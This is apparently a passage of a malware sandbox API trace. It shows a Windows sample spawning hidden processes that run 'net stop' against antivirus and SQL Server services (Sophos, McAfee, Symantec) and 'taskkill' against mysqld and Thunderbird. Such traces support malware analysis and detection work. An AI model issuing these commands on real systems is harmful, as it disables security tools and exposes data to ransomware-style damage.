[0116.557] CloseHandle (hObject=0x4a4) returned 1 [0117.761] GetStdHandle (nStdHandle=0xfffffff6) returned 0x0 [0117.761] CreatePipe (in: hReadPipe=0x63ff138, hWritePipe=0x63ff134, lpPipeAttributes=0x63ff0b8, nSize=0x0 | out: hReadPipe=0x63ff138*=0x3e0, hWritePipe=0x63ff134*=0x478) returned 1 [0117.761] GetCurrentProcess () returned 0xffffffff [0117.762] GetCurrentProcess () returned 0xffffffff [0117.762] DuplicateHandle (in: hSourceProcessHandle=0xffffffff, hSourceHandle=0x3e0, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x63ff13c, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x63ff13c*=0x51c) returned 1 [0117.762] CloseHandle (hObject=0x3e0) returned 1 [0117.762] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0 [0117.762] CoTaskMemAlloc (cb=0x20e) returned 0x741d20 [0117.762] GetCurrentDirectoryW (in: nBufferLength=0x105, lpBuffer=0x741d20 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp") returned 0x39 [0117.762] CoTaskMemFree (pv=0x741d20) [0117.762] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"net.exe\" stop RESvc /y", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x8000000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp", lpStartupInfo=0x63ff080*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x100, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x478, hStdError=0x0), lpProcessInformation=0x22727b4 | out: lpCommandLine="\"net.exe\" stop RESvc /y", lpProcessInformation=0x22727b4*(hProcess=0x4f4, hThread=0x3e0, dwProcessId=0xc5c, dwThreadId=0x7c8)) returned 1 [0117.770] CloseHandle (hObject=0x478) returned 1 [0117.770] GetFileType (hFile=0x51c) returned 0x3 [0117.770] CloseHandle (hObject=0x3e0) returned 1 [0120.691] GetStdHandle (nStdHandle=0xfffffff6) returned 0x0 [0120.691] CreatePipe (in: hReadPipe=0x63ff138, hWritePipe=0x63ff134, lpPipeAttributes=0x63ff0b8, nSize=0x0 | out: hReadPipe=0x63ff138*=0x518, hWritePipe=0x63ff134*=0x478) returned 1 [0120.691] GetCurrentProcess () returned 0xffffffff [0120.691] GetCurrentProcess () returned 0xffffffff [0120.691] DuplicateHandle (in: hSourceProcessHandle=0xffffffff, hSourceHandle=0x518, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x63ff13c, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x63ff13c*=0x548) returned 1 [0120.692] CloseHandle (hObject=0x518) returned 1 [0120.692] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0 [0120.692] CoTaskMemAlloc (cb=0x20e) returned 0x741d20 [0120.692] GetCurrentDirectoryW (in: nBufferLength=0x105, lpBuffer=0x741d20 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp") returned 0x39 [0120.692] CoTaskMemFree (pv=0x741d20) [0120.692] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"net.exe\" stop mfevtp /y", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x8000000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp", lpStartupInfo=0x63ff080*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x100, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x478, hStdError=0x0), lpProcessInformation=0x266d3c8 | out: lpCommandLine="\"net.exe\" stop mfevtp /y", lpProcessInformation=0x266d3c8*(hProcess=0x544, hThread=0x518, dwProcessId=0xe68, dwThreadId=0xe70)) returned 1 [0120.699] CloseHandle (hObject=0x478) returned 1 [0120.699] GetFileType (hFile=0x548) returned 0x3 [0120.699] CloseHandle (hObject=0x518) returned 1 [0122.651] GetStdHandle (nStdHandle=0xfffffff6) returned 0x0 [0122.651] CreatePipe (in: hReadPipe=0x63ff138, hWritePipe=0x63ff134, lpPipeAttributes=0x63ff0b8, nSize=0x0 | out: hReadPipe=0x63ff138*=0x478, hWritePipe=0x63ff134*=0x3cc) returned 1 [0122.651] GetCurrentProcess () returned 0xffffffff [0122.651] GetCurrentProcess () returned 0xffffffff [0122.651] DuplicateHandle (in: hSourceProcessHandle=0xffffffff, hSourceHandle=0x478, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x63ff13c, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x63ff13c*=0x518) returned 1 [0122.651] CloseHandle (hObject=0x478) returned 1 [0122.651] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0 [0122.651] CoTaskMemAlloc (cb=0x20e) returned 0x741d20 [0122.651] GetCurrentDirectoryW (in: nBufferLength=0x105, lpBuffer=0x741d20 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp") returned 0x39 [0122.651] CoTaskMemFree (pv=0x741d20) [0122.652] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"net.exe\" stop SmcService /y", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x8000000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp", lpStartupInfo=0x63ff080*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x100, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x3cc, hStdError=0x0), lpProcessInformation=0x22723a8 | out: lpCommandLine="\"net.exe\" stop SmcService /y", lpProcessInformation=0x22723a8*(hProcess=0x3f0, hThread=0x478, dwProcessId=0xf24, dwThreadId=0xabc)) returned 1 [0122.955] CloseHandle (hObject=0x3cc) returned 1 [0122.955] GetFileType (hFile=0x518) returned 0x3 [0122.955] CloseHandle (hObject=0x478) returned 1 [0124.465] GetStdHandle (nStdHandle=0xfffffff6) returned 0x0 [0124.465] CreatePipe (in: hReadPipe=0x63ff138, hWritePipe=0x63ff134, lpPipeAttributes=0x63ff0b8, nSize=0x0 | out: hReadPipe=0x63ff138*=0x478, hWritePipe=0x63ff134*=0x3cc) returned 1 [0124.465] GetCurrentProcess () returned 0xffffffff [0124.465] GetCurrentProcess () returned 0xffffffff [0124.465] DuplicateHandle (in: hSourceProcessHandle=0xffffffff, hSourceHandle=0x478, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x63ff13c, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x63ff13c*=0x598) returned 1 [0124.465] CloseHandle (hObject=0x478) returned 1 [0124.465] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0 [0124.465] CoTaskMemAlloc (cb=0x20e) returned 0x741d20 [0124.465] GetCurrentDirectoryW (in: nBufferLength=0x105, lpBuffer=0x741d20 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp") returned 0x39 [0124.465] CoTaskMemFree (pv=0x741d20) [0124.465] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"net.exe\" stop SQLAgent$SBSMONITORING /y", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x8000000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp", lpStartupInfo=0x63ff070*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x100, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x3cc, hStdError=0x0), lpProcessInformation=0x253f380 | out: lpCommandLine="\"net.exe\" stop SQLAgent$SBSMONITORING /y", lpProcessInformation=0x253f380*(hProcess=0x578, hThread=0x478, dwProcessId=0xdc4, dwThreadId=0xcc0)) returned 1 [0124.471] CloseHandle (hObject=0x3cc) returned 1 [0124.471] GetFileType (hFile=0x598) returned 0x3 [0124.471] CloseHandle (hObject=0x478) returned 1 [0127.849] GetStdHandle (nStdHandle=0xfffffff6) returned 0x0 [0127.849] CreatePipe (in: hReadPipe=0x63ff138, hWritePipe=0x63ff134, lpPipeAttributes=0x63ff0b8, nSize=0x0 | out: hReadPipe=0x63ff138*=0x3cc, hWritePipe=0x63ff134*=0x444) returned 1 [0127.849] GetCurrentProcess () returned 0xffffffff [0127.849] GetCurrentProcess () returned 0xffffffff [0127.849] DuplicateHandle (in: hSourceProcessHandle=0xffffffff, hSourceHandle=0x3cc, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x63ff13c, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x63ff13c*=0x588) returned 1 [0127.849] CloseHandle (hObject=0x3cc) returned 1 [0127.849] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0 [0127.849] CoTaskMemAlloc (cb=0x20e) returned 0x741d20 [0127.849] GetCurrentDirectoryW (in: nBufferLength=0x105, lpBuffer=0x741d20 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp") returned 0x39 [0127.849] CoTaskMemFree (pv=0x741d20) [0127.849] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"net.exe\" stop SntpService /y", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x8000000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp", lpStartupInfo=0x63ff080*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x100, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x444, hStdError=0x0), lpProcessInformation=0x2271ccc | out: lpCommandLine="\"net.exe\" stop SntpService /y", lpProcessInformation=0x2271ccc*(hProcess=0x3a4, hThread=0x3cc, dwProcessId=0x102c, dwThreadId=0x138c)) returned 1 [0128.143] CloseHandle (hObject=0x444) returned 1 [0128.143] GetFileType (hFile=0x588) returned 0x3 [0128.143] CloseHandle (hObject=0x3cc) returned 1 [0133.740] GetStdHandle (nStdHandle=0xfffffff6) returned 0x0 [0133.740] CreatePipe (in: hReadPipe=0x63ff138, hWritePipe=0x63ff134, lpPipeAttributes=0x63ff0b8, nSize=0x0 | out: hReadPipe=0x63ff138*=0x444, hWritePipe=0x63ff134*=0x520) returned 1 [0133.741] GetCurrentProcess () returned 0xffffffff [0133.741] GetCurrentProcess () returned 0xffffffff [0133.741] DuplicateHandle (in: hSourceProcessHandle=0xffffffff, hSourceHandle=0x444, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x63ff13c, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x63ff13c*=0x418) returned 1 [0133.741] CloseHandle (hObject=0x444) returned 1 [0133.741] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0 [0133.741] CoTaskMemAlloc (cb=0x20e) returned 0x741d20 [0133.741] GetCurrentDirectoryW (in: nBufferLength=0x105, lpBuffer=0x741d20 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp") returned 0x39 [0133.741] CoTaskMemFree (pv=0x741d20) [0133.742] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"net.exe\" stop SQLAgent$SHAREPOINT /y", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x8000000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp", lpStartupInfo=0x63ff074*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x100, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x520, hStdError=0x0), lpProcessInformation=0x22700e8 | out: lpCommandLine="\"net.exe\" stop SQLAgent$SHAREPOINT /y", lpProcessInformation=0x22700e8*(hProcess=0x5a0, hThread=0x444, dwProcessId=0x1038, dwThreadId=0x3f8)) returned 1 [0133.860] CloseHandle (hObject=0x520) returned 1 [0133.860] GetFileType (hFile=0x418) returned 0x3 [0133.860] CloseHandle (hObject=0x444) returned 1 [0135.475] GetStdHandle (nStdHandle=0xfffffff6) returned 0x0 [0135.475] CreatePipe (in: hReadPipe=0x63ff138, hWritePipe=0x63ff134, lpPipeAttributes=0x63ff0b8, nSize=0x0 | out: hReadPipe=0x63ff138*=0x448, hWritePipe=0x63ff134*=0x504) returned 1 [0135.476] GetCurrentProcess () returned 0xffffffff [0135.476] GetCurrentProcess () returned 0xffffffff [0135.476] DuplicateHandle (in: hSourceProcessHandle=0xffffffff, hSourceHandle=0x448, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x63ff13c, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x63ff13c*=0x2c4) returned 1 [0135.476] CloseHandle (hObject=0x448) returned 1 [0135.476] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0 [0135.476] CoTaskMemAlloc (cb=0x20e) returned 0x741d20 [0135.476] GetCurrentDirectoryW (in: nBufferLength=0x105, lpBuffer=0x741d20 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp") returned 0x39 [0135.476] CoTaskMemFree (pv=0x741d20) [0135.477] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"net.exe\" stop sophossps /y", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x8000000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp", lpStartupInfo=0x63ff080*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x100, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x504, hStdError=0x0), lpProcessInformation=0x2795634 | out: lpCommandLine="\"net.exe\" stop sophossps /y", lpProcessInformation=0x2795634*(hProcess=0x4d0, hThread=0x448, dwProcessId=0x131c, dwThreadId=0x11a4)) returned 1 [0135.643] CloseHandle (hObject=0x504) returned 1 [0135.643] GetFileType (hFile=0x2c4) returned 0x3 [0135.643] CloseHandle (hObject=0x448) returned 1 [0139.640] GetStdHandle (nStdHandle=0xfffffff6) returned 0x0 [0139.640] CreatePipe (in: hReadPipe=0x63ff138, hWritePipe=0x63ff134, lpPipeAttributes=0x63ff0b8, nSize=0x0 | out: hReadPipe=0x63ff138*=0x518, hWritePipe=0x63ff134*=0x4f4) returned 1 [0139.640] GetCurrentProcess () returned 0xffffffff [0139.640] GetCurrentProcess () returned 0xffffffff [0139.640] DuplicateHandle (in: hSourceProcessHandle=0xffffffff, hSourceHandle=0x518, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x63ff13c, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x63ff13c*=0x5a4) returned 1 [0139.640] CloseHandle (hObject=0x518) returned 1 [0139.640] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0 [0139.640] CoTaskMemAlloc (cb=0x20e) returned 0x741d20 [0139.640] GetCurrentDirectoryW (in: nBufferLength=0x105, lpBuffer=0x741d20 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp") returned 0x39 [0139.641] CoTaskMemFree (pv=0x741d20) [0139.641] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"net.exe\" stop SQLAgent$SQL_2008 /y", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x8000000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp", lpStartupInfo=0x63ff078*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x100, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x4f4, hStdError=0x0), lpProcessInformation=0x2275d08 | out: lpCommandLine="\"net.exe\" stop SQLAgent$SQL_2008 /y", lpProcessInformation=0x2275d08*(hProcess=0x520, hThread=0x518, dwProcessId=0x1244, dwThreadId=0x132c)) returned 1 [0139.655] CloseHandle (hObject=0x4f4) returned 1 [0139.655] GetFileType (hFile=0x5a4) returned 0x3 [0139.655] CloseHandle (hObject=0x518) returned 1 [0140.686] GetStdHandle (nStdHandle=0xfffffff6) returned 0x0 [0140.686] CreatePipe (in: hReadPipe=0x63ff138, hWritePipe=0x63ff134, lpPipeAttributes=0x63ff0b8, nSize=0x0 | out: hReadPipe=0x63ff138*=0x518, hWritePipe=0x63ff134*=0x4e0) returned 1 [0140.686] GetCurrentProcess () returned 0xffffffff [0140.687] GetCurrentProcess () returned 0xffffffff [0140.687] DuplicateHandle (in: hSourceProcessHandle=0xffffffff, hSourceHandle=0x518, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x63ff13c, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x63ff13c*=0x4f8) returned 1 [0140.687] CloseHandle (hObject=0x518) returned 1 [0140.687] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0 [0140.687] CoTaskMemAlloc (cb=0x20e) returned 0x741d20 [0140.687] GetCurrentDirectoryW (in: nBufferLength=0x105, lpBuffer=0x741d20 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp") returned 0x39 [0140.687] CoTaskMemFree (pv=0x741d20) [0140.687] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"net.exe\" stop SQLAgent$SOPHOS /y", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x8000000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp", lpStartupInfo=0x63ff07c*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x100, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x4e0, hStdError=0x0), lpProcessInformation=0x2470a68 | out: lpCommandLine="\"net.exe\" stop SQLAgent$SOPHOS /y", lpProcessInformation=0x2470a68*(hProcess=0x560, hThread=0x518, dwProcessId=0x1098, dwThreadId=0x974)) returned 1 [0141.180] CloseHandle (hObject=0x4e0) returned 1 [0141.185] GetFileType (hFile=0x4f8) returned 0x3 [0141.185] CloseHandle (hObject=0x518) returned 1 [0142.619] GetStdHandle (nStdHandle=0xfffffff6) returned 0x0 [0142.619] CreatePipe (in: hReadPipe=0x63ff138, hWritePipe=0x63ff134, lpPipeAttributes=0x63ff0b8, nSize=0x0 | out: hReadPipe=0x63ff138*=0x5a0, hWritePipe=0x63ff134*=0x50c) returned 1 [0142.620] GetCurrentProcess () returned 0xffffffff [0142.620] GetCurrentProcess () returned 0xffffffff [0142.620] DuplicateHandle (in: hSourceProcessHandle=0xffffffff, hSourceHandle=0x5a0, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x63ff13c, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x63ff13c*=0x548) returned 1 [0142.620] CloseHandle (hObject=0x5a0) returned 1 [0142.620] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0 [0142.620] CoTaskMemAlloc (cb=0x20e) returned 0x741d20 [0142.620] GetCurrentDirectoryW (in: nBufferLength=0x105, lpBuffer=0x741d20 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp") returned 0x39 [0142.620] CoTaskMemFree (pv=0x741d20) [0142.620] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"net.exe\" stop SQLAgent$SQLEXPRESS /y", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x8000000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp", lpStartupInfo=0x63ff074*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x100, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x50c, hStdError=0x0), lpProcessInformation=0x2276094 | out: lpCommandLine="\"net.exe\" stop SQLAgent$SQLEXPRESS /y", lpProcessInformation=0x2276094*(hProcess=0x4e0, hThread=0x5a0, dwProcessId=0xfb4, dwThreadId=0xb74)) returned 1 [0142.859] CloseHandle (hObject=0x50c) returned 1 [0142.859] GetFileType (hFile=0x548) returned 0x3 [0142.859] CloseHandle (hObject=0x5a0) returned 1 [0142.866] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0143.164] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0143.936] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0144.975] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0145.102] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0145.171] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0145.225] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0145.264] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0145.327] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0145.569] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0145.670] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0145.730] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0145.762] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0146.406] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0147.865] GetStdHandle (nStdHandle=0xfffffff6) returned 0x0 [0147.865] CreatePipe (in: hReadPipe=0x63ff138, hWritePipe=0x63ff134, lpPipeAttributes=0x63ff0b8, nSize=0x0 | out: hReadPipe=0x63ff138*=0x50c, hWritePipe=0x63ff134*=0x4b0) returned 1 [0147.866] GetCurrentProcess () returned 0xffffffff [0147.866] GetCurrentProcess () returned 0xffffffff [0147.866] DuplicateHandle (in: hSourceProcessHandle=0xffffffff, hSourceHandle=0x50c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x63ff13c, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x63ff13c*=0x3f0) returned 1 [0147.866] CloseHandle (hObject=0x50c) returned 1 [0147.866] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0 [0147.866] CoTaskMemAlloc (cb=0x20e) returned 0x741d20 [0147.866] GetCurrentDirectoryW (in: nBufferLength=0x105, lpBuffer=0x741d20 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp") returned 0x39 [0147.866] CoTaskMemFree (pv=0x741d20) [0147.866] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"taskkill.exe\" /IM mysqld.exe /F", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x8000000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp", lpStartupInfo=0x63ff080*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x100, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x4b0, hStdError=0x0), lpProcessInformation=0x249939c | out: lpCommandLine="\"taskkill.exe\" /IM mysqld.exe /F", lpProcessInformation=0x249939c*(hProcess=0x5a4, hThread=0x50c, dwProcessId=0x414, dwThreadId=0x3c4)) returned 1 [0147.880] CloseHandle (hObject=0x4b0) returned 1 [0147.880] GetFileType (hFile=0x3f0) returned 0x3 [0147.880] CloseHandle (hObject=0x50c) returned 1 [0149.494] GetStdHandle (nStdHandle=0xfffffff6) returned 0x0 [0149.494] CreatePipe (in: hReadPipe=0x63ff138, hWritePipe=0x63ff134, lpPipeAttributes=0x63ff0b8, nSize=0x0 | out: hReadPipe=0x63ff138*=0x4b0, hWritePipe=0x63ff134*=0x504) returned 1 [0149.494] GetCurrentProcess () returned 0xffffffff [0149.495] GetCurrentProcess () returned 0xffffffff [0149.495] DuplicateHandle (in: hSourceProcessHandle=0xffffffff, hSourceHandle=0x4b0, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x63ff13c, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x63ff13c*=0x540) returned 1 [0149.495] CloseHandle (hObject=0x4b0) returned 1 [0149.495] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0 [0149.495] CoTaskMemAlloc (cb=0x20e) returned 0x741d20 [0149.495] GetCurrentDirectoryW (in: nBufferLength=0x105, lpBuffer=0x741d20 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp") returned 0x39 [0149.495] CoTaskMemFree (pv=0x741d20) [0149.495] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"taskkill.exe\" /IM tbirdconfig.exe /F", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x8000000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp", lpStartupInfo=0x63ff074*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x100, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x504, hStdError=0x0), lpProcessInformation=0x227528c | out: lpCommandLine="\"taskkill.exe\" /IM tbirdconfig.exe /F", lpProcessInformation=0x227528c*(hProcess=0x5a8, hThread=0x4b0, dwProcessId=0x100c, dwThreadId=0xb58)) returned 1 [0149.514] CloseHandle (hObject=0x504) returned 1 [0149.514] GetFileType (hFile=0x540) returned 0x3 [0149.514] CloseHandle (hObject=0x4b0) returned 1 [0150.320] GetStdHandle (nStdHandle=0xfffffff6) returned 0x0 [0150.320] CreatePipe (in: hReadPipe=0x63ff138, hWritePipe=0x63ff134, lpPipeAttributes=0x63ff0b8, nSize=0x0 | out: hReadPipe=0x63ff138*=0x504, hWritePipe=0x63ff134*=0x558) returned 1 [0150.321] GetCurrentProcess () returned 0xffffffff [0150.321] GetCurrentProcess () returned 0xffffffff [0150.321] DuplicateHandle (in: hSourceProcessHandle=0xffffffff, hSourceHandle=0x504, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x63ff13c, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x63ff13c*=0x4c8) returned 1 [0150.321] CloseHandle (hObject=0x504) returned 1 [0150.321] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0 [0150.321] CoTaskMemAlloc (cb=0x20e) returned 0x741d20 [0150.321] GetCurrentDirectoryW 